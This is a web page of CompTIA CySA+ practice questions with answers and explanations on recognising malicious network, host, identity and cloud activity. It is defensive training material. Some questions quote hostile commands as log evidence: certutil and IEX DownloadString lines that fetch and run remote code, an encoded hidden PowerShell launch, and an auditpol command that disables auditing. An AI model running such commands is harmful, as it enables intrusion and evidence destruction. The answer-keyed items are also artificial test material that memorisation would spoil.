← Back

19 Indicators of Malicious Activity Practice Questions & Answers

Every Indicators of Malicious Activity practice question from the CompTIA CySA+ Practice Test, with the correct answer and a short explanation.

Start practice test →
  1. 1. A DNS server log shows 4,100 queries from one laptop in ten minutes, all for subdomains of a single external domain, with labels such as k7f3qm2x9vd4hs2p that are 30 to 40 characters long. Every answer is a TXT record of similar size, and the laptop never opens a session to the address that domain resolves to. What does this pattern best indicate?

    • A.A content delivery network is issuing per-session hostnames as part of ordinary load balancing.
    • B.DNS tunnelling is carrying a command-and-control or data channel inside the query and answer fields.✓ Answer
    • C.A cache flush is making the laptop repopulate its entries directly from the authoritative name server.
    • D.A misconfigured resolver is retrying failed lookups and adding a random label to every attempt.

    Encoding payload into query labels and reading replies out of TXT records turns name resolution itself into a bidirectional transport, which is why it survives egress filtering that blocks direct outbound sessions. The discriminators here are the query volume, the long high-entropy labels all under one parent domain, similarly sized TXT answers, and the absence of any connection to the resolved address — retries, CDN hostnames and cache repopulation produce none of that combination.

    Source: CompTIA CySA+ CS0-004 objective 1.2, network indicators (anomalous activity / DNS abuse); MITRE ATT&CK T1071.004 Application Layer Protocol: DNSReport a problem with this question

  2. 2. Over five minutes a workstation asks the internal resolver for 600 names it has never queried before, such as qvbnlxzrt.com and mwdkphjsg.net, and 597 return NXDOMAIN. The 598th resolves, and the workstation immediately opens a TLS session to that address. What does this sequence indicate?

    • A.A reputation feed is pre-resolving newly reported domains so the endpoint can cache verdicts.
    • B.A browser feature is guessing alternative spellings for an address the user mistyped in the bar.
    • C.A stale DNS search suffix list is making the client append each configured domain in turn.
    • D.Domain generation algorithm malware is cycling candidate names until one the operator registered resolves.✓ Answer

    A domain generation algorithm derives a large set of pseudo-random names from a shared seed so defenders cannot block a fixed list; the operator registers only one, so almost every lookup fails. That is why the telling shape is a burst of NXDOMAIN answers ending in one successful resolution followed immediately by an outbound session — typo correction, search suffixes and reputation lookups never terminate in a connection to the single name that resolved.

    Source: CompTIA CySA+ CS0-004 objective 1.2, network indicators (anomalous DNS activity); MITRE ATT&CK T1568.002 Dynamic Resolution: Domain Generation AlgorithmsReport a problem with this question

  3. 3. A network sensor logs outbound sessions from a developer workstation to 203.0.113.44 on port 443. The first bytes of every session are the string SSH-2.0-OpenSSH_8.9, no TLS ClientHello is ever sent, and the sessions stay open for hours with steady traffic in both directions. What is the best explanation?

    • A.TLS 1.3 encrypted client hello is hiding the handshake fields from the sensor's parser.
    • B.A load balancer health probe is reusing port 443 to run a plain-text availability check.
    • C.An SSH session is being tunnelled over port 443 so that web-only egress filtering will pass it.✓ Answer
    • D.An unsupported cipher suite made the client fall back from HTTPS to an unencrypted web protocol.

    The port number only describes where a session is going, while the first bytes on the wire identify the protocol actually in use, and SSH-2.0-OpenSSH_8.9 is the SSH version-exchange banner rather than any part of a TLS handshake. A long-lived interactive session carrying SSH on the one port egress policy always permits is the classic port-versus-protocol mismatch; TLS 1.3 still emits a ClientHello record, so a missing handshake is not explained by encrypted client hello.

    Source: CompTIA CySA+ CS0-004 objective 1.2, network indicators (activity on unexpected ports); MITRE ATT&CK T1572 Protocol Tunneling; RFC 4253 SSH identification stringReport a problem with this question

  4. 4. A print server that hosts no user file shares transferred 48 GB to a residential broadband address on port 443 between 01:00 and 04:00. The nightly backup job for that host writes to an internal appliance on a different port and finished at 23:40 with a success record. What does the evidence best support?

    • A.Data is leaving the print server to an external host in a volume its role cannot explain.✓ Answer
    • B.Log rotation shipped archived spool files to the organisation's offsite storage subscription.
    • C.The backup job overran its window and spilled the remainder of the job to a secondary target.
    • D.A vendor firmware update pulled a large image set and cached it locally on the print server.

    Volume is judged against the role of the host, and a print server has no business reason to send tens of gigabytes anywhere, least of all outbound to a consumer broadband address. The backup explanation is ruled out by the evidence rather than by assumption: that job uses an internal destination on a different port and had already completed successfully an hour earlier, and a firmware update would be inbound traffic, not 48 GB leaving.

    Source: CompTIA CySA+ CS0-004 objective 1.2, network indicators (data exfiltration); MITRE ATT&CK T1048 Exfiltration Over Alternative ProtocolReport a problem with this question

  5. 5. Between 02:00 and 02:40, host 10.20.5.9 sent SYN packets to 1,000 ports on each of 240 internal hosts, then authenticated to each host with the account svc_scan. The address is listed in the asset inventory as the credentialed assessment host, and the window matches the published maintenance calendar. What is the correct reading?

    • A.This is expected authenticated assessment traffic; confirm source and window, then close it.✓ Answer
    • B.This is a rogue device that has joined the network and is mapping it from an unmanaged address.
    • C.This is a worm spreading laterally by probing every port before it authenticates to a target.
    • D.This is an internal host that has been compromised and is now enumerating the server estate.

    Enumeration traffic looks identical whether it is hostile or authorised, so the indicator is only resolved by attributing the source and the timing: an inventoried assessment host using its own service account inside a published window is a benign explanation, not a finding. Saying what evidence does not prove matters here, because escalating this consumes response capacity and trains the team to ignore the same pattern when it later comes from an address nobody owns.

    Source: CompTIA CySA+ CS0-004 objective 1.2, network indicators (scanning and enumeration) — distinguishing authorised assessment activity from reconnaissanceReport a problem with this question

  6. 6. Process creation events on a user workstation show outlook.exe as the parent of cmd.exe, which in turn started powershell.exe with the arguments -nop -w hidden -enc SQBFAFgAIAAoAE4A. The events are stamped 10:42 on a Tuesday. What does this chain indicate?

    • A.Content opened in the mail client spawned a hidden, encoded PowerShell command through cmd.exe.✓ Answer
    • B.A logon script approved by the desktop team refreshes profile settings at each sign-in.
    • C.The update service uses PowerShell to stage the patches released for this morning.
    • D.The mail client is running its own maintenance script to rebuild a damaged local mailbox.

    Lineage is the discriminator: a mail client is not a legitimate parent of a command shell, and the arguments compound the finding because -w hidden suppresses the window, -nop skips the user profile, and -enc supplies a base64 command that exists only to keep the real instruction out of the log an analyst reads first. Legitimate maintenance, logon scripts and patch staging descend from service or session hosts, not from the process that just opened an attachment.

    Source: CompTIA CySA+ CS0-004 objective 1.2, host indicators (suspicious processes, scripts); MITRE ATT&CK T1059.001 Command and Scripting Interpreter: PowerShell; Windows Security event 4688 process creationReport a problem with this question

  7. 7. A host inventory lists two running processes named svchost.exe: one with image path C:\Windows\System32\svchost.exe whose parent is services.exe, and one with image path C:\Users\jrivera\AppData\Local\Temp\svchost.exe whose parent is explorer.exe and which holds an open connection to an external address. Which conclusion fits?

    • A.The Temp copy is a per-user service instance, which Windows places in the profile by design.
    • B.Both are normal, because svchost.exe hosts many services and Windows starts one per service group.
    • C.The System32 copy is the imposter, because service hosts are normally launched by explorer.exe.
    • D.The Temp copy is masquerading, because genuine svchost.exe runs from System32 under services.exe.✓ Answer

    A trusted process name proves nothing on its own; the image path and the parent are what authenticate it, and the genuine service host always executes from System32 with services.exe as its parent. A copy under a user profile temp directory launched by the shell is masquerading, and the outbound connection it holds is the behaviour the name was chosen to hide — the real instance may legitimately appear many times, but never from that path.

    Source: CompTIA CySA+ CS0-004 objective 1.2, host indicators (rogue processes); MITRE ATT&CK T1036.005 Masquerading: Match Legitimate Name or LocationReport a problem with this question

  8. 8. At 03:12 a file server records service installation event 7045 for a service named WinDefragSvc with image path C:\ProgramData\wdfg.exe and automatic start, created under a domain administrator account. No change request references the host, and no defragmentation product is licensed in the environment. What does this indicate?

    • A.A licensed maintenance agent registered itself the first time an administrator signed in.
    • B.A service was installed to keep code running after reboot, using a name chosen to look routine.✓ Answer
    • C.A disk optimisation schedule was created by the operating system's own storage service.
    • D.A patch cycle installed a kernel driver service, which is why its start type is automatic on it.

    A service with automatic start is one of the most durable persistence mechanisms available, because the operating system relaunches the binary at every boot without a user present. Three details make this malicious rather than administrative: the executable sits in a writable data directory instead of a vendor program path, the plausible-sounding name corresponds to no licensed product, and an out-of-hours privileged change exists with no corresponding change record to attribute it to.

    Source: CompTIA CySA+ CS0-004 objective 1.2, host indicators (file system and configuration changes); MITRE ATT&CK T1543.003 Create or Modify System Process: Windows Service; Windows System event 7045Report a problem with this question

  9. 9. Command-line auditing captured, seconds apart on one host: certutil.exe -urlcache -split -f http://198.51.100.7/a.txt C:\Users\Public\a.txt and then certutil.exe -decode C:\Users\Public\a.txt C:\Users\Public\a.exe. What does this pair of commands indicate?

    • A.A certificate request is being submitted to an enterprise authority over plain HTTP.
    • B.A revocation list is being retrieved and written out for the local certificate store.
    • C.A signed Microsoft utility is being abused to fetch a payload and decode it into an executable.✓ Answer
    • D.A machine certificate is being exported to a shared folder for another administrator.

    Read as a pair, the commands are a download followed by a base64 decode that produces a new executable, which has nothing to do with certificate handling even though certutil is a certificate tool. The technique works because the binary is native and Microsoft-signed, so controls that trust publisher signatures or allowlist operating-system utilities let it through — which is why the argument pattern, not the image name, is what must be alerted on.

    Source: CompTIA CySA+ CS0-004 objective 1.2, host indicators (living-off-the-land binaries and scripts); MITRE ATT&CK T1105 Ingress Tool Transfer and T1140 Deobfuscate/Decode Files or InformationReport a problem with this question

  10. 10. A server logs, in this order: process creation for auditpol.exe /set /subcategory:"Process Creation" /success:disable at 02:39, event 1102 at 02:41, and a stop of the event log service at 02:42. The forwarding agent had already shipped the earlier events to the collector. What does this sequence indicate?

    • A.A retention policy trimmed the oldest records once the log reached its configured size.
    • B.A maintenance script reclaimed disk space by clearing logs before an overnight backup.
    • C.An intruder with administrative rights disabled and cleared auditing to destroy local evidence.✓ Answer
    • D.An agent upgrade restarted the logging components and then rewrote the audit policy from template.

    The order is the evidence: auditing for process creation is switched off first, the security log is then cleared, and logging is stopped last, which is a deliberate progression aimed at the record of the intrusion rather than at disk space. Retention trimming overwrites the oldest entries without generating a clear event, and the attempt is self-defeating here because the forwarded copies already left the host.

    Source: CompTIA CySA+ CS0-004 objective 1.2, host indicators (unauthorized changes, anti-forensics); MITRE ATT&CK T1070.001 Indicator Removal: Clear Windows Event Logs; Windows Security event 1102Report a problem with this question

  11. 11. Script block logging records IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.9/s') on a workstation. The PowerShell process's parent is wmiprvse.exe, no new file appears on disk, and the endpoint agent shows an outbound session to the same address. What does this indicate?

    • A.A software deployment tool pushed a package, which it always stages through the management service.
    • B.A scheduled task ran a stored script that the task engine had cached in its own database.
    • C.Code was executed in memory over a remote WMI session, leaving no file for disk scanning to find.✓ Answer
    • D.An administrator tested a download in an interactive console on the machine's own desktop.

    DownloadString retrieves the script as text and IEX evaluates it in the current process, so execution never touches the file system and a scanner with nothing to scan reports the host clean. The wmiprvse.exe parent places the origin on another machine rather than at the keyboard, which is why script block logging plus process lineage — not file-based detection — is what makes this class of activity visible.

    Source: CompTIA CySA+ CS0-004 objective 1.2, host indicators (anomalous activity, memory-resident execution); MITRE ATT&CK T1047 Windows Management Instrumentation and T1059.001 PowerShell; PowerShell event 4104Report a problem with this question

  12. 12. Web logs show 9,000 POST requests to /api/password-reset in forty minutes from twelve source addresses, each carrying a different email address. The application answers 200 with a "reset sent" body when the address exists and 404 when it does not; 112 requests received 200. What does this indicate?

    • A.Denial of service: the reset endpoint is being flooded to exhaust the mail queue behind it.
    • B.A mail loop: bounced reset messages are being resubmitted automatically by a broken forwarder.
    • C.Credential stuffing: username and password pairs from breaches are being replayed against the site.
    • D.Account enumeration: the differing status codes tell the attacker which addresses are registered.✓ Answer

    The application is acting as an oracle: because the response differs by whether the account exists, each request returns one bit of information about a real user, and the 112 successes are a harvested target list for later phishing or password attacks. No password is submitted anywhere in this traffic, which rules out credential stuffing, and the request rate is far too low to be an availability attack on the mail queue.

    Source: CompTIA CySA+ CS0-004 objective 1.2, application indicators (anomalous activity, enumeration); OWASP Authentication guidance on non-enumerable responsesReport a problem with this question

  13. 13. Application logs show the same session cookie value used in requests from two networks 6,000 km apart within the same 90 seconds, with two different User-Agent strings, and no re-authentication between the two sets of requests. What is the best explanation?

    • A.A stolen session token is being replayed from another host, since one cookie cannot serve two devices.✓ Answer
    • B.A mobile handoff changed the carrier address while the client kept the same session open.
    • C.Impossible travel by the account owner, who signed in from a second country after moving.
    • D.A reverse proxy is rewriting request headers and collapsing separate sessions into one.

    Impossible travel compares two authentications and can be explained away by a VPN or a roaming user, but this evidence is concurrent use of one issued token from two clients, which no single user can produce. The differing User-Agent strings and the absence of any new sign-in show the token was exported and replayed rather than re-issued, so the response is to invalidate that session server-side rather than only reset the password.

    Source: CompTIA CySA+ CS0-004 objective 1.2, identity and application indicators (unauthorized access); MITRE ATT&CK T1539 Steal Web Session Cookie and T1550.004 Use Alternate Authentication Material: Web Session CookieReport a problem with this question

  14. 14. A domain controller records 1,412 failed logon events (4625) for the account svc_backup from 198.51.100.22 over twenty-two minutes, then one successful logon (4624) with logon type 10 from the same address, followed by a special privileges event (4672). What does this indicate?

    • A.Password spraying: one password was tried across many accounts to stay under lockout limits.
    • B.Password guessing against one account succeeded, then a privileged remote interactive logon.✓ Answer
    • C.A lockout threshold is misconfigured, so a service is repeatedly retrying its own stale secret.
    • D.Credential stuffing: pairs from a third-party breach were replayed until one of them worked.

    The shape of the evidence names the technique: many attempts concentrated on one account from one source is brute-force guessing, whereas spraying is one password spread thinly across many accounts precisely to avoid lockout. What makes this a confirmed compromise rather than noise is the ending — logon type 10 is a remote interactive session and the following special privileges event shows sensitive rights were assigned to it.

    Source: CompTIA CySA+ CS0-004 objective 1.2, identity indicators (unauthorized access); MITRE ATT&CK T1110.001 Brute Force: Password Guessing; Windows Security events 4625, 4624 (logon type 10) and 4672Report a problem with this question

  15. 15. An alert reports the same account authenticating from Denver at 08:02 and from Frankfurt at 08:09. The Frankfurt address belongs to the company's own cloud VPN egress range, both events carry the same device certificate, and the account's baseline shows that egress on every working day. How should this be read?

    • A.A false positive from VPN egress geography; verify the range and device, then close it.✓ Answer
    • B.A confirmed account takeover; disable the account and force a credential reset immediately.
    • C.A stolen refresh token replayed from a second country while the first session stayed active.
    • D.A geolocation database error that placed a domestic address in the wrong country entirely.

    Impossible travel is an inference about a person drawn from addresses, so it is only as good as what the addresses represent: traffic leaving through a company VPN concentrator carries that concentrator's geography, not the user's. Here the second address is an owned egress range, the device certificate is the same in both events, and the pattern matches the user's daily baseline, so the finding is unproven and the remaining checks are ownership of the range and identity of the device. The geolocation database is not wrong — it correctly located a foreign egress point.

    Source: CompTIA CySA+ CS0-004 objective 1.2, identity indicators (impossible travel) — validating an indicator against egress ownership and device evidence before escalationReport a problem with this question

  16. 16. An identity audit log shows a user granting consent to a third-party application that requested Mail.Read, Mail.Send and offline_access. The publisher is unverified, the application was registered three days ago, and within the hour it reads 2,300 messages through the API. No password change and no MFA prompt appear anywhere in the log. What does this indicate?

    • A.MFA fatigue pushed the user into approving a prompt that the attacker had triggered.
    • B.A mail client synchronised the mailbox after the user added the account to a new device.
    • C.An illicit consent grant gave the application lasting token access to the mailbox.✓ Answer
    • D.A stolen password was used to sign in, and the attacker then configured mailbox rules.

    Nothing in this evidence involves a credential: the user authorised an application, and the platform then issued it tokens, with offline_access meaning access continues without the user present. That is why resetting the password or re-prompting for MFA does not evict the attacker — the grant itself has to be revoked and the tokens invalidated, and the unverified publisher with a three-day-old registration is the reputation signal that should have blocked consent.

    Source: CompTIA CySA+ CS0-004 objective 1.2, identity indicators (IAM account compromise, unauthorized access); MITRE ATT&CK T1528 Steal Application Access Token (illicit consent grant)Report a problem with this question

  17. 17. Directory logs show a help desk account added to Domain Admins at 01:04 (event 4728), that account reading 14,000 files on a finance share between 01:06 and 01:19, and the same account removed from the group at 01:21 (event 4729). Its owner was on approved leave all week. What does this indicate?

    • A.An access recertification job removed a membership that had failed its quarterly review.
    • B.Privilege was elevated only for the minutes it was needed and then reverted, to conceal the access.✓ Answer
    • C.A just-in-time elevation workflow granted and revoked rights exactly as it was designed to.
    • D.A directory replication artefact duplicated a group change and then reversed the entry.

    Add, use, remove inside seventeen minutes is the point of the evidence: reverting the membership leaves a current-state review showing nothing unusual, so only the event history and the file access in between reveal what happened. Just-in-time elevation is the tempting answer because it produces the same two events, but a sanctioned workflow is requested and approved by a present owner, and here the owner was on leave while the rights were used against a finance share at night.

    Source: CompTIA CySA+ CS0-004 objective 1.2, identity indicators (privilege abuse, unauthorized access); MITRE ATT&CK T1098 Account Manipulation; Windows Security events 4728 and 4729Report a problem with this question

  18. 18. Cloud audit records show an access key belonging to a build pipeline used from a region the organisation never deploys to. Within four minutes the same key calls DescribeRegions, CreateUser, AttachUserPolicy with administrator rights, and RunInstances for twenty GPU instances. What does this indicate?

    • A.The pipeline was pointed at the wrong region and is provisioning its build fleet there.
    • B.The key is compromised and is being used to add persistence and consume paid compute.✓ Answer
    • C.An autoscaling policy expanded the build fleet after a queue of jobs backed up overnight.
    • D.A provider maintenance event migrated the workload and reissued its identity objects.

    The sequence is what convicts, not any single call: discovery of available regions, creation of a second identity with administrative rights, then expensive compute in an unused region is the classic stolen-key pattern, where the new user is persistence that survives rotation of the original key. A misconfigured pipeline or an autoscaling policy builds instances but has no reason to create an administrator, and a maintenance event does not call CreateUser on the customer's behalf.

    Source: CompTIA CySA+ CS0-004 objective 1.2, cloud indicators (anomalous activity, resource consumption); MITRE ATT&CK T1078.004 Valid Accounts: Cloud Accounts, T1098.001 Additional Cloud Credentials, T1496 Resource HijackingReport a problem with this question

  19. 19. A cloud audit trail records StopLogging on the organisation trail by the role ci-deploy at 02:14, PutBucketPolicy granting s3:GetObject to principal "*" on a customer data bucket at 02:15, and 41,000 GetObject calls from one external address between 02:16 and 03:40. What does the ordering indicate?

    • A.A lifecycle rule moved objects to a public tier, and a crawler then indexed the contents.
    • B.A replication job copied the bucket to a second account and reused the external endpoint.
    • C.A drifted infrastructure template reapplied an older policy and disabled the trail with it.
    • D.Auditing was silenced first, then the bucket was opened for bulk download of the data.✓ Answer

    Sequence separates an accident from an intrusion: disabling the audit trail one minute before widening the bucket policy is a decision about being observed, which no template, lifecycle rule or replication job makes. The external reader then arriving immediately to pull tens of thousands of objects completes the chain of defence evasion followed by deliberate exposure and exfiltration, and the compromised role is the identity to contain.

    Source: CompTIA CySA+ CS0-004 objective 1.2, cloud indicators (anomalous activity, resource compromise); MITRE ATT&CK T1562.008 Impair Defenses: Disable or Modify Cloud Logs and T1567 Exfiltration Over Web ServiceReport a problem with this question

Practice questions based on the CompTIA CySA+ exam objectives. This site is not affiliated with or endorsed by CompTIA, and these are not real exam questions. CompTIA refreshes this exam periodically, runs two versions side by side during a transition, and sets the exam length, passing standard and eligibility terms — confirm the current objectives and the live exam code with CompTIA before you register. The real exam also includes performance-based items that a multiple-choice bank cannot reproduce, so pair this with hands-on practice. Official CySA+ exam objectives →